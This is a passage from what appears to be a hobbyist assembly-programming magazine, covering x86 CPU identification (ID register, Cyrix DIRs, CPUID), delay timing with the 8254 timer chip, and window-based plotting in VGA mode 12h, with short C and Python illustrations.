                 mov     [es:0469h], cs          ; segment
                 mov     [es:0472h], word 0      ; Update shutdown status

         ; Switch to pmode
                 lgdt    [GDTR]                  ; Load GDT
                 lidt    [IDTR]                  ; Load empty IDT
                 smsw    ax
                 or      al, 01h                 ; Set pmode bit
                 lmsw    ax
                 jmp     0008h:_reset            ; Reload CS
_reset:         mov     ax, [cs:0FFFFh]         ; Reach beyond segment limit

         ; After reset we are here with DX containing the ID register
_tfr:           cli
                 mov     ax, cs
                 mov     ds, ax
                 mov     es, ax
                 mov     ss, ax
                 mov     sp, [SaveSP]
                 sti

;------------------------------------------------------------------------------
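
The "or [GDT+10], eax" line in the listing patches the segment base into the
code descriptor. How the two dwords of such a descriptor are laid out can be
sketched in C as below. This is an illustration only: the Descriptor type and
make_descriptor() are made-up names, and the granularity/size flags (bits
20..23 of the high dword) are left at zero, as they are in the listing.

```c
#include <assert.h>
#include <stdint.h>

typedef struct { uint32_t low, high; } Descriptor;

/* Packs a segment descriptor the way the two dd values in the GDT hold it.
   `access` is the access byte (9Ah in the listing's code segment). */
Descriptor make_descriptor(uint32_t base, uint32_t limit, uint8_t access)
{
    assert(limit <= 0xFFFFFu);                 /* the limit field is 20 bits */
    Descriptor d;
    d.low  = (limit & 0xFFFFu)                 /* limit 15..0  */
           | ((base & 0xFFFFu) << 16);         /* base 15..0   */
    d.high = ((base >> 16) & 0xFFu)            /* base 23..16  */
           | ((uint32_t)access << 8)           /* access byte  */
           | (limit & 0xF0000u)                /* limit 19..16 */
           | (base & 0xFF000000u);             /* base 31..24  */
    return d;
}
```

With base 0 this gives exactly the 0000FFFFh, 00009A00h pair from the data
section; a real-mode segment such as 1CB6h (an arbitrary example) has base
1CB60h and yields CB60FFFFh, 00009A01h.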

Of course there are  also other ways of reading the ID register.  They are well
described in DDJ (www.x86.org).

As said before,  the ID register contains information about processor model and
stepping. The format of the register is as follows:

         bits 15..12     - stepping
         bits 11..8      - model
         bits 7..0       - revision

Some example ID register values:

         0303    i386DX
         2303    i386SX
         3301    i376

This format  of the ID register  was used in  Intel 386 processors  (all except
RapidCAD), AMD 386 processors and most of IBM 486 processors.

Another format of the ID register was introduced with Intel 486 processors.
This format is similar to the format of the CPUID model information (see
below), and it stayed the same up to the Pentium. However, newer processors do
not keep any useful information in the ID register (it is usually 0). This also
applies to Cyrix 486 processors.

         bits 15..14     - unused, zero
         bits 13..12     - typically indicate overdrive
         bits 11..8      - model
         bits 7..4       - stepping
         bits 3..0       - revision

And some example ID register values with this format for Intel processors:

         0401    i486DX-25/33
         0421    i486SX
         0451    i486SX2
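
Picking the fields out of DX is plain shifting and masking. The C sketch below
follows the two bit layouts given above; the IdFields type and the two function
names are made up for the example, and the field names are simply the ones used
in this article.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    unsigned overdrive;  /* only meaningful for the 486-style layout */
    unsigned model;
    unsigned stepping;
    unsigned revision;
} IdFields;

/* 386-style layout: bits 15..12 stepping, 11..8 model, 7..0 revision */
IdFields decode_id_386(uint16_t dx)
{
    IdFields f = { 0, (dx >> 8) & 0xFu, (dx >> 12) & 0xFu, dx & 0xFFu };
    return f;
}

/* 486-style layout: bits 13..12 overdrive, 11..8 model, 7..4 stepping,
   3..0 revision */
IdFields decode_id_486(uint16_t dx)
{
    assert((dx & 0xC000u) == 0);   /* bits 15..14 are listed as zero */
    IdFields f = { (dx >> 12) & 0x3u, (dx >> 8) & 0xFu,
                   (dx >> 4) & 0xFu, dx & 0xFu };
    return f;
}
```

For example, 2303 (i386SX) decodes as stepping 2, model 3, revision 3 in the
first layout, and 0421 (i486SX) as model 4, stepping 2, revision 1 in the
second.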


Cyrix DIR
---------
All Cyrix processors have Device Identification Registers (DIRs), which are
used to identify these processors. To read the DIRs, one first has to determine
that one is running on a Cyrix processor. This can be accomplished in two ways:

  1. On modern processors, using the CPUID instruction.
  2. On the first Cyrix processors, using the 5/2 method.

If  there  is  no  CPUID  instruction,   one  has  to  use  the  other  way  of
determination.  If one  knows that he  is on a  486 processor,  he can  use the
following code:

                 mov     ax, 0005h
                 mov     cl, 2
                 sahf
                 div     cl
                 lahf
                 cmp     ah, 2
                 je      _we_are_on_cyrix
                 jne     _this_is_not_cyrix

Once we have  determined we are  on a Cyrix processor,  we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h.  Port 22h keeps register number
and port 23h register value.

         ; This function reads a Cyrix control register
         ; It expects a register address in AL and returns value also in AL
ReadCCR:        out     22h, al         ; select register
times 3         jmp     short $+2       ; delay
                 in      al, 23h         ; get register contents
                 ret

DIRs have offsets 0FEh (DIR0) and 0FFh (DIR1). DIR1 contains revision, while
DIR0 contains model/stepping. The following code reads them:

                 mov     al, 0FEh
                 call    ReadCCR
                 mov     [DIR0], al
                 mov     al, 0FFh
                 call    ReadCCR
                 mov     [DIR1], al

Example DIR0 values:

         1B      Cx486DX2
         31      6x86(L) clock x2
         55      6x86MX clock x4


CPUID Instruction
-----------------
All newer  processors have  the CPUID instruction,  which helps  to identify on
what  processor  we are.  Before using it,  we must  first determine  if it  is
supported, by flipping the ID flag (bit 21 of EFLAGS).

                 pushfd
                 pop     eax
                 xor     eax, 00200000h  ; flip bit 21
                 push    eax
                 popfd
                 pushfd
                 pop     ecx
                 xor     eax, ecx        ; zero if the flipped bit 21 stuck
                 jz      _cpuid_supported
                 jnz     _no_cpuid

The only problem may be that NexGen processors do not support the ID flag, but
they do support the CPUID instruction. To determine that, we must hook the
Invalid Opcode exception (INT 6) and execute the instruction. If the exception
is triggered, CPUID is not supported.

Also, some early Cyrix processors (namely the 5x86 and 6x86) have the CPUID
instruction disabled. To enable it, we must first enable the extended CCR
registers and then enable the instruction by setting bit 7 in CCR4.

         ; Enable extended CCRs
                 mov     al, 0C3h        ; C3 corresponds to CCR3
                 call    ReadCCR
                 and     ah, 0Fh         ; bits 7..4 of CCR3 <- 0001b
                 or      ah, 10h
                 call    WriteCCR

         ; Enable CPUID
                 mov     al, 0E8h        ; E8 corresponds to CCR4
                 call    ReadCCR
                 or      ah, 80h         ; bit 7 enables CPUID
                 call    WriteCCR

The following functions are used to read/write CCRs:

ReadCCR:        out     22h, al         ; Select control register
times 3         jmp     short $+2
                 xchg    al, ah
                 in      al, 23h         ; Read the register
                 xchg    al, ah
                 ret

WriteCCR:       out     22h, al         ; Select control register
times 3         jmp     short $+2
                 mov     al, ah
                 out     23h, al         ; Write the register
                 ret

After enabling CPUID we must  test if it is supported by  flipping the ID flag,
unless  of course  we  have determined  that  we are not  on a  5x86 or 6x86 by
reading DIRs.

Once we have determined that CPUID is supported, we can use it to identify the
processor. The instruction expects EAX to hold a function number (level) and
returns information corresponding to this number in EAX, EBX, ECX and EDX. The
two most important levels are listed below.

         level 0 (eax=0) returns:

         eax             Maximum available level
         ebx:edx:ecx     Vendor ID in ASCII characters
                         Intel   - "GenuineIntel" (ebx='Genu', bl='G'(47h))
                         AMD     - "AuthenticAMD"
                         Cyrix   - "CyrixInstead"
                         Rise    - "RiseRiseRise"
                         Centaur - "CentaurHauls"
                         NexGen  - "NexGenDriven"
                         UMC     - "UMC UMC UMC "

         level 1 (eax=1) returns:

         eax             bits 13..12     0 - normal
                                         1 - overdrive
                                         2 - secondary in dual system
                         bits 11..8      family
                         bits 7..4       model
                         bits 3..0       stepping
                         If Processor Serial Number is enabled, all 32
                         bits are treated as the high bits (95..64) of
                         the number.
         edx             Processor features (e.g. bit 23 indicates MMX)
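
The register layouts above can be checked away from the machine. The following
is only a sketch in Python (not part of the original assembly), assuming the
register values have already been captured after CPUID. The function names are
made up for this illustration, and 0652h is just a sample value. Intel's
documentation calls the four EAX fields type, family, model and stepping.

```python
import struct

def vendor_string(ebx, edx, ecx):
    """Join the three level 0 registers into the 12-character vendor ID."""
    # Each register holds four ASCII characters, lowest byte first,
    # and the string is read in the order EBX, EDX, ECX.
    return struct.pack("<III", ebx, edx, ecx).decode("ascii")

def decode_signature(eax):
    """Split the level 1 EAX value into its four bit fields."""
    return {
        "type":     (eax >> 12) & 0x3,   # bits 13..12
        "family":   (eax >> 8) & 0xF,    # bits 11..8
        "model":    (eax >> 4) & 0xF,    # bits 7..4
        "stepping": eax & 0xF,           # bits 3..0
    }

def has_mmx(edx):
    """Bit 23 of the level 1 EDX value indicates MMX."""
    return bool(edx & 0x00800000)

print(vendor_string(0x756E6547, 0x49656E69, 0x6C65746E))
print(decode_signature(0x0652))
```

Note that the low byte of EBX is 47h ('G'), as mentioned in the vendor list.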

There are also other levels, e.g. level 2 returns cache and TLB descriptors,
level 3 the rest of the Processor Serial Number.

Some processors (AMD, Cyrix) also support extended levels. The first extended
level is 80000000h and it returns in EAX the maximum extended level. These
extended levels return information specific to the processor, e.g. 3DNow!
support or the processor name.

This example code determines MMX support:

         ; First check maximum available level
                 xor     eax, eax        ; eax = 0 (level 0)
                 cpuid
                 cmp     eax, 0
                 jng     _no_higher_levels

         ; Now check MMX support
                 mov     eax, 1          ; level 1
                 cpuid
                 test    edx, 00800000h  ; bit 23 is set if MMX is supported
                 jnz     _mmx_supported
                 jz      _no_mmx

As this is not  the place for listing all the  available information about what
values  are returned  by CPUID,  ID register or DIRs,  you should get  the most
recent information from the processor vendors:

         www.intel.com
         www.amd.com
         www.cyrix.com

Also you can find very valuable information about the identification topic on:

         www.sandpile.org
         www.x86.org
         www.cs.cmu.edu/~ralf/files.html



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                Timing with the 8254 PIT
                                                        by Jan Verhoeven


Some time ago I saw a note on the mailing list from someone in need of a
flexible timer function. There are several ways to build one.

First, there is the timertick which is updated every 55 ms. For long
time delays, this is the best method. Just read the timervalue at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.

A second approach is to use modern BIOSes which have a timing function
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.

A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (up to 8 kHz) which even has interrupt
capabilities for automated functions and simple multitasking.

But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.

This chip can be put in many operating modes, but we want it to do the
following:

         - start counting at a certain value
         - count down
         - latched reading mode
         - no influence on further PC operation

The counting sequence for the PC is as follows:

         - there are 2^16 BIOS-timervalue updates per hour
         - there are 2^16 8254 clockpulses per timertick

So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.
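
The arithmetic behind the 838 ns figure is easy to verify. This is a small
Python calculation (not part of the original article) that uses only the round
numbers given above. The constant PIT_HZ is an addition: 1,193,182 Hz is the
commonly documented nominal input clock of the PC timer chip, and it gives
nearly the same result.

```python
TICKS_PER_HOUR = 2 ** 16     # BIOS timer updates per hour (round figure)
PULSES_PER_TICK = 2 ** 16    # 8254 clock pulses per timer tick

pulses_per_hour = TICKS_PER_HOUR * PULSES_PER_TICK      # 2^32
pulse_ns = 3600 / pulses_per_hour * 1e9                 # length of one pulse
tick_ms = 3600 / TICKS_PER_HOUR * 1e3                   # length of one tick

PIT_HZ = 1_193_182           # nominal clock, an assumption added here
nominal_ns = 1e9 / PIT_HZ

print(f"{pulse_ns:.2f} ns per pulse, {tick_ms:.2f} ms per tick")
print(f"{nominal_ns:.2f} ns per pulse from the nominal clock")
```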

In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.

Here comes.....

---------- OpenTimer ---------------------------- Start ----------

PROCEDURE OpenTimer;        (*  open timer chip in mode 2   *)

BEGIN
     ASM
         MOV  AL, 34H
         OUT  43H, AL
         XOR  AL, AL
         OUT  40H, AL
         OUT  40H, AL
     END;
END OpenTimer;

---------- OpenTimer ----------------------------- End -----------

The value 34h is constructed as follows:

         bit     function
        -----    ---------------------------
        6 - 7    select counter (0 - 2)
        4 - 5    Read/write mode
        1 - 3    Select countermode
          0      Binary or BCD

For this case we selected:

         - counter 00
         - read/write two bytes from/to counterchip
         - Mode 2
         - binary values

These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....
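
To double-check a control word against the bit table above, it can be taken
apart mechanically. This is a sketch in Python rather than ASM or Modula, and
the function name is made up for this illustration.

```python
def decode_control_word(value):
    """Split an 8254 control word into the four fields of the table above."""
    return {
        "counter": (value >> 6) & 0x3,   # bits 6 - 7
        "rw_mode": (value >> 4) & 0x3,   # bits 4 - 5 (3 = low byte, then high byte)
        "mode":    (value >> 1) & 0x7,   # bits 1 - 3
        "bcd":     value & 0x1,          # bit 0 (0 = binary)
    }

print(decode_control_word(0x34))
```

For 34h this reports counter 0, read/write mode 3 (two bytes), mode 2 and
binary counting.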

It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.

---------- CloseTimer --------------------------- Start ----------

PROCEDURE CloseTimer;           (*  close timer chip    *)

BEGIN
     ASM
         MOV  AL, 36H
         OUT  43H, AL
         XOR  AL, AL
         OUT  40H, AL
         OUT  40H, AL
     END;
END CloseTimer;

---------- CloseTimer ---------------------------- End -----------

This function just restores the timer to its default mode and clears
the counting registers. The value "36h" means:

         - counter 00
         - read/write two bytes from/to counterchip
         - Mode 3
         - binary values

---------- ReadTimer ---------------------------- Start ----------

PROCEDURE ReadTimer () : CARDINAL;     (*  read timer   *)

VAR     Time        : CARDINAL;

BEGIN
     ASM
         MOV  AL, 6
         OUT  43H, AL
         IN   AL, 40H
         MOV  AH, AL
         IN   AL, 40H
         XCHG AH, AL
         MOV  [Time], AX
     END;
     RETURN Time;
END ReadTimer;

---------- ReadTimer ----------------------------- End -----------

After we opened the timer, it might be a good idea to also use it. This
is done in four steps:

  - current value of counting register is latched in On-Chip buffer
  - the low byte is read in first
  - the high byte is read in second
  - low and high byte are put in right order

Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!

The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".

---------- MilliSeconds ------------------------- Start ----------

PROCEDURE MilliSeconds (ms : CARDINAL);

VAR     MaxCount        : CARDINAL;

BEGIN
     MaxCount := 65535 - ms * 1193;
     OpenTimer;
     WHILE ReadTimer () > MaxCount DO
         (*      Nothing!     *)
     END;
     CloseTimer;
END MilliSeconds;

---------- MilliSeconds -------------------------- End -----------

This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.

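Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmetic. Keep the delay at 54 ms or less: 55 * 1193 is already
larger than 65,535, so the calculation no longer fits in a 16 bit
CARDINAL.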

This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.
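
The stop-value calculation of MilliSeconds can be modelled in a few lines.
This is a Python sketch, not the author's code. The names are made up, and the
range check is an addition that makes the 16 bit limit of a CARDINAL explicit.

```python
PULSES_PER_MS = 1193                  # rounded pulses per millisecond
MAX_MS = 65535 // PULSES_PER_MS       # longest delay that fits in 16 bits

def max_count(ms):
    """Counter value at which a delay of `ms` milliseconds has elapsed."""
    if not 0 <= ms <= MAX_MS:
        raise ValueError("delay does not fit in a 16 bit down-counter")
    # The counter starts at 0000, wraps to FFFF and counts down from there.
    return 65535 - ms * PULSES_PER_MS

print(MAX_MS, max_count(10), max_count(MAX_MS))
```

For longer delays the routine would have to be called repeatedly, or the BIOS
timer tick used instead.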

The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the

---------- TestTimer ---------------------------- Start ----------

PROCEDURE TestTimer;

VAR     First, Last, Delta, k        : CARDINAL;

BEGIN
     OpenTimer;
     First := ReadTimer ();
     WriteCard (First, 6);       Write (Tab);
     FOR k := 1 TO 10000 DO
         (*      Nothing!     *)
     END;
     Last := ReadTimer ();
     Delta := First - Last;
     WriteCard (Delta, 6);       WriteLn;
     CloseTimer;
END TestTimer;

---------- TestTimer ----------------------------- End -----------
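
The subtraction "First - Last" in TestTimer relies on 16 bit wrap-around,
because the counter counts DOWN and may pass through zero between the two
readings. This Python sketch models that and converts the result to
microseconds with the round figure of 2^32 pulses per hour. The function names
are hypothetical.

```python
def elapsed_pulses(first, last):
    """Pulses between two readings of the down-counter, modulo 2^16."""
    return (first - last) & 0xFFFF

def pulses_to_us(pulses):
    """Convert pulses to microseconds (2^32 pulses per hour)."""
    return pulses * 3600 / 2 ** 32 * 1e6

print(elapsed_pulses(65000, 64000))   # no wrap between the readings
print(elapsed_pulses(100, 65500))     # counter passed through zero
```

The result is only meaningful if fewer than 65,536 pulses (about 55 ms)
passed between the two readings.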

You could use this routine to calibrate a timingloop, but on modern PC
architectures this could well lead to disasters. Modern CPUs are so
damned fast that your loopcounter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.

A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timingloops, assuming that 1 IN operation is
about 1 microsecond. But it could well lead to trouble on modern PCI
hardware.

All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!


In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                        Programming for the one and only universal graphics mode
                                                                by Jan Verhoeven


If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).

Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omnipresent.

That's why I decided to port my textmode windows to this graphics mode.


The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.

Once all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one of their own.


How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:

         mov     ax, 012
         int     010

and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.


Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.

For all my plotting, I use the following structure:

     -------------------------------- Window Information Block ------
     Infoblk1 STRUC
     Win_X    dw    ?        ; top-left window position, X and ...
     Win_Y    dw    ?        ;     ... Y
     Win_wid  dw    ?        ; window width and ...
     Win_hgt  dw    ?        ;     ... height
     CurrX    dw    ?        ; within window, current X-coordinate, ...
     CurrY    dw    ?        ;     ... and Y
     DeltaX   dw    ?
     DeltaY   dw    ?
     Indent   dw    ?        ; Indentation for characters in PIXELS!
     Multiply dw    ?        ; screenwidth handler
     Watte01  dw    ?        ;
     BoxCol   db    ?        ;     border colour
     TxtCol   db    ?        ;       text colour
     BckCol   db    ?        ; background colour
     MenuCol  db    ?        ;  menu text colour
              ENDS
     -------------------------------- Window Information Block ------

It will be clear after looking at this list that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unit.

Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.

Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.

For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.

Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY positions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.

For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.

Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:

         PixAddr = CurrY * 80 + CurrX / 8

So we need a set of damned fast Mul_80 routines. If needed you can write
several of them, find out the CPU and hardware at init-time, and fill the most
suitable routine into the Window definition structures.

The "Watte01" field is just a filler. Reserved by me.

Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.

It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. Also if the colours are not optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:

     fullscrn dw     0,  0,640,480, 0, 0, 0, 0, 4, mul_80, 0
              db    12, 14,  3, 15               ; main screen window

FullScrn just describes the complete screen. It is used for some very general
printing and plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.
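
To see how such a definition maps onto the Infoblk1 structure, the record can
be modelled as eleven words followed by four bytes. This is a Python sketch,
not A86 code. MUL_80_OFFSET is a hypothetical placeholder, since the real
offset of mul_80 is only known to the assembler.

```python
import struct
from collections import namedtuple

InfoBlk = namedtuple(
    "InfoBlk",
    "win_x win_y win_wid win_hgt curr_x curr_y delta_x delta_y "
    "indent multiply watte01 box_col txt_col bck_col menu_col",
)

LAYOUT = "<11H4B"            # 11 little-endian words, then 4 colour bytes
MUL_80_OFFSET = 0x1234       # hypothetical stand-in for "offset mul_80"

def pack_window(win):
    """Produce the bytes the dw/db lines would assemble to."""
    return struct.pack(LAYOUT, *win)

def unpack_window(raw):
    """Turn the raw bytes back into named fields."""
    return InfoBlk(*struct.unpack(LAYOUT, raw))

fullscrn = InfoBlk(0, 0, 640, 480, 0, 0, 0, 0, 4, MUL_80_OFFSET, 0,
                   12, 14, 3, 15)
raw = pack_window(fullscrn)
print(len(raw), unpack_window(raw).win_wid)
```

Each window definition therefore takes 26 bytes.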

     ParWin2  dw     5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
              db    10, 11,  3, 11               ; Parameter window

This is a window which is a subwindow of the Full Screen for storing data and
parameters.

     PlotWin  dw     5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
              db     9, 15,  3,  7               ; Virtual plotting window

This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:

     PlotWin2 dw     6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
              db     9, 15,  3,  7               ; Actual plotting window

This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for an elaborate checking of extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It does not look nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.

The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:

     ------------ Digit Space ------------------------------- Start ---

     DigSpac1 dw    16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 14,  3          ; Digital display, digit 1, MSD
     DigSpac2 dw    56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 14,  3          ; Digital display, digit 2
     DigSpac3 dw    96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 12,  3          ; Digital display, digit 3
     DigSpac4 dw   136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
              db     9, 11, 12,  3          ; Digital display, digit 4, LSD

     MSD = Most Significant Digit            LSD = Least Significant Digit

     ------------ Digit Space -------------------------------- End ----

This way it is convenient to align the digits on screen. As with normal
LED-style digits, the seven segments of them are drawn piece by piece. And
erased if necessary.

As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.

Something else to observe is, that the two or three digits behind the decimal
point have another colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.

This all costs a few bytes extra, but it saves a lot of coding.


How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally push
the constant on the stack or load it into AX, and use that to transfer it to
the actual segment register. This is not necessary. It can be done much more
easily, like below:

     VGA_base dw    0A000        ; for ease of loading segment registers

And the corresponding code:

     mov     es, [VGA_base]

The detour via the stack or via AX takes more cycles and bytes.


Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:

     -------------- Topic ----------------------------------- Start ---
     Topic MACRO             ; start of printing message
       dw   #1, #2
       db   #3, #4
       #EM

     TopicEnd MACRO          ; topics stop here
       dw   0F000
       #EM

              Topic 180, 9, 'Start : '
     ParaStrt db    'Manual   ', 0

              Topic  9, 28, 'Power : '
     ParaPowr db    'OFF', 0

              Topic 360, 55, 'Group : '
     ParaGrup db    '16 ', 0

              TopicEnd
     -------------- Topic ------------------------------------ End ----

The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.

Each "to-print" table is shut down by a TopicEnd Macro. It defines a new
CurrX of -4096. That clearly is out of range, so this is end of table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.
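
The table layout can be tried out with a small model. This is a Python sketch
and not the author's printing routine, which is not shown in this part. It
assumes that each entry is two words followed by text up to a zero byte, and
that a first word of 0F000 ends the table. The function names are made up.

```python
import struct

END_MARK = 0xF000          # the word emitted by TopicEnd

def topic(x, y, label, value):
    """Build one entry: two words, then the label and the NUL-ended value."""
    return (struct.pack("<HH", x, y)
            + label.encode("ascii") + value.encode("ascii") + b"\0")

def parse_topics(table):
    """Walk the table until the end marker; return (x, y, text) tuples."""
    entries, pos = [], 0
    while True:
        (x,) = struct.unpack_from("<H", table, pos)
        if x == END_MARK:
            return entries
        (y,) = struct.unpack_from("<H", table, pos + 2)
        end = table.index(b"\0", pos + 4)      # text runs up to the NUL byte
        entries.append((x, y, table[pos + 4:end].decode("ascii")))
        pos = end + 1

table = (topic(180, 9, "Start : ", "Manual   ")
         + topic(9, 28, "Power : ", "OFF")
         + struct.pack("<H", END_MARK))

# Read as a signed 16 bit number, the marker is the -4096 mentioned above.
signed_mark = struct.unpack("<h", struct.pack("<H", END_MARK))[0]
print(parse_topics(table), signed_mark)
```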


Multiplying by 80.
------------------
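From the Pentium Pro on, the MUL instruction is fast enough that this hardly
matters. On the 486 and Pentium it still takes more than ten cycles, so for
these and all older CPUs (from the 80186 on, because of the immediate shift
counts) the following code could mean a significant speed increase: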

     -------------------- Multiply ------------------------ Start ----
     mul_80:  push  bx               ; PixAddr in Mode 012
              shl   ax, 4
              mov   bx, ax           ; bx = 16 x SCR_Y
              shl   ax, 2            ; ax = 64 x SCR_Y
              add   ax, bx           ; ax = 80 x SCR_Y
              pop   bx
              ret
     -------------------- Multiply ------------------------- End -----

This routine is used over and over again, so a few microseconds more or less
will make a big difference.
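
That the shift-and-add sequence really multiplies by 80 can be checked for
every screen row. This is a Python model of the register operations, with
results masked to 16 bits as AX and BX would be. It is a sketch for
verification only.

```python
def mul_80(y):
    """Model of the mul_80 routine: 16*y + 64*y, in 16 bit registers."""
    ax = (y << 4) & 0xFFFF        # shl ax, 4   -> 16 * y
    bx = ax                       # mov bx, ax
    ax = (ax << 2) & 0xFFFF       # shl ax, 2   -> 64 * y
    return (ax + bx) & 0xFFFF     # add ax, bx  -> 80 * y

all_rows_ok = all(mul_80(y) == y * 80 for y in range(480))
print(all_rows_ok, mul_80(479))
```

The largest row offset, 479 * 80 = 38320, still fits in 16 bits, so nothing
is lost in the shifts.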


Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. Its segment is 0A000 and its offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.

Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.

So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:

     --------------------- SetMask ------------------------ Start -------
     SetMask: push  dx               ; ah = mask
              mov   dx, 03CE
              mov   al, 8
              out   dx, ax           ; set bit mask
              pop   dx
              ret
     --------------------- SetMask ------------------------- End --------

This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:

              mov   al, 8
              out   dx, ax           ; set bit mask

is identical to:

              mov   al, 8
              out   dx, al
              inc   dx
              mov   al, ah
